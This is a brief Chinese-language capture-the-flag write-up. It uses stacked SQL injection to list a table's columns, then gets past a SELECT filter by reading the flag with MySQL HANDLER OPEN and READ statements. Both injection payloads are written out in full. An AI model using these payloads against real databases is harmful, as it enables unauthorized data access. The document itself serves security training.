打开,使用堆叠注入之后发现了flag在FlagHere下;
1';show columns from FlagHere;
使用常规的select查看flag的值会被过滤掉,这么绕过都不行;
使用handler;
HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭
所以构造
1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;